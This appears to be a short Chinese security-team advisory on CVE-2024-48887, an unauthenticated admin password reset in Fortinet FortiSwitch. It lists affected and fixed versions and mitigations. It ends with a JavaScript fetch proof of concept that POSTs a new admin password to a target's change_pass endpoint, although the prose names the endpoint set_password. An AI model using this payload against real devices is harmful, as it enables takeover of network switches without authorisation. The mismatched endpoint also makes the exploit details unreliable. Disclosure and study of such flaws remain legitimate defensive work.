Fortinet FortiSwitch 任意密码重置 CVE-2024-48887

Khan安全团队 2025-04-25 03:48

该漏洞源于通过 FortiSwitch Web 界面更改密码时缺乏适当的验证。攻击者可以向set_password终端发送特殊请求，无需登录或任何用户交互即可更改管理员密码。由于该漏洞复杂度较低，因此存在重大风险——几乎可以在任何暴露界面的环境中实施。

受影响的版本范围从FortiSwitch 6.4.0 到 7.6.0。该问题已在固件版本 6.4.15、7.0.11、7.2.9、7.4.5 和 7.6.1 中得到修复。对于无法及时应用更新的用户，Fortinet 建议采取临时缓解措施：禁用对管理界面的 HTTP 和 HTTPS 访问，并将设备访问限制为仅受信任的主机。

fetch('http://target-ip/change_pass', {
  method: 'POST',
  headers: { 'Content-Type': 'application/json' },
  body: JSON.stringify({
    username: 'admin',
    newpass: 'pwned123',
    confirm: 'pwned123'
  })
})
.then(res => res.text())
.then(data => console.log('Response:', data));